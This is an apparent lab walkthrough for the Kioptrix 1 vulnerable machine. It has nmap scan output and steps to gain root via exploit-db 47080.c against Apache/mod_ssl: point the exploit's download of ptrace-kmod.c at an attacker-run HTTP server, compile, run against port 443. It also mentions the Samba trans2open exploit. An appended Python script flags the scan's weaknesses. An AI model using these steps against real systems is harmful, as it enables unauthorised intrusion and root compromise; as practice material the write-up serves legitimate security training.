Kioptrix 1

Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-23 10:21 PST
Nmap scan report for 10.10.0.5
Host is up (0.0069s latency).
Not shown: 994 closed tcp ports (conn-refused)
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 2.9p2 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey:
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
80/tcp    open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
| http-methods:
|_  Potentially risky methods: TRACE
111/tcp   open  rpcbind     2 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1          32768/tcp   status
|_  100024  1          32770/udp   status
139/tcp   open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp   open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26T09:32:06
|_Not valid after:  2010-09-26T09:32:06
|_ssl-date: 2022-01-23T15:22:09+00:00; -2h59m50s from scanner time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|_    SSL2_DES_64_CBC_WITH_MD5
|_http-title: 400 Bad Request
32768/tcp open  status      1 (RPC #100024)

Host script results:
|_clock-skew: -2h59m50s
|_smb2-time: Protocol negotiation failed (SMB2)
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.28 seconds

80/tcp open http Apache httpd 1.3.20 ((Unix)

Apache 1.3.20 is vulnerable to a buffer overflow. I used the exploit in /usr/share/exploitdb/exploits/unix/remote/47080.c

Due to the vulnerable nature of this machine I had to download the ptrace-kmod.c on kali and host it.

https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

Download the file. Modify 47080.c before compiling.

Basically you need to change the wget line to your kali vm ip. For example:

http://10.10.0.1/Downloads/ptrace-kmod.c

Compile with gcc -o 47080 47080.c -lcrypto

Then put up your server: python3 -m http.server 80 (note that my kali vm was on the same network as the vuln machine)

Now execute the script ./47080 0x6b ipaddress 443

It took a few tries before it finally worked.

You can also exploit this machine through smb. In our nmap scan we see that port 139 is open. Let's see what version is running.

Running a quick search shows that this version is vulnerable to trans2open.

Run that and you will have root access.
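As an added example (not part of the original walkthrough), a small Python script that parses the nmap output above and flags the exposures the writeup relies on: SSHv1 and SSLv2 support, the TRACE method, the Apache 1.3.20 / mod_ssl 2.8.4 build and the Samba service on 139. The SCAN text is constructed from the lines shown above, and the RULES table is an assumption about what a triage script should flag; the same parser works on any `nmap -sV -sC` normal output.

```python
import re

# Constructed sample: the relevant lines of the walkthrough's nmap output.
SCAN = """\
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 2.9p2 (protocol 1.99)
|_sshv1: Server supports SSHv1
80/tcp    open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_  Potentially risky methods: TRACE
139/tcp   open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp   open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| sslv2:
|   SSLv2 supported
"""

# One port line: "<port>/<proto> <state> <service> <version...>"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

def parse_scan(text):
    """Return a list of {port, proto, state, service, version, scripts} records.
    NSE script lines ("|" / "|_" prefixed) are attached to the preceding port."""
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            ports.append({"port": int(m[1]), "proto": m[2], "state": m[3],
                          "service": m[4], "version": m[5].strip(), "scripts": []})
        elif line.startswith("|") and ports:
            ports[-1]["scripts"].append(line.lstrip("|_ ").strip())
    return ports

# (regex, field to search, finding). Assumed triage rules built from this page.
RULES = [
    (r"OpenSSH 2\.9", "version", "end-of-life OpenSSH 2.9"),
    (r"SSHv1", "scripts", "SSH protocol 1 enabled"),
    (r"Apache(?: httpd)?[ /]1\.3\.20", "version", "Apache 1.3.20 with mod_ssl 2.8.4 (known remote overflow)"),
    (r"TRACE", "scripts", "HTTP TRACE method enabled"),
    (r"SSLv2 supported", "scripts", "SSLv2 accepted"),
    (r"Samba smbd", "version", "Samba exposed, version not reported (enumerate and patch)"),
]

def assess(ports):
    """Return (port, finding) pairs for every rule that matches an open port."""
    findings = []
    for p in ports:
        if p["state"] != "open":
            continue
        haystack = {"version": p["version"], "scripts": "\n".join(p["scripts"])}
        for pattern, field, msg in RULES:
            if re.search(pattern, haystack[field]):
                findings.append((p["port"], msg))
    return findings

if __name__ == "__main__":
    for port, msg in assess(parse_scan(SCAN)):
        print(f"{port}/tcp: {msg}")
```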
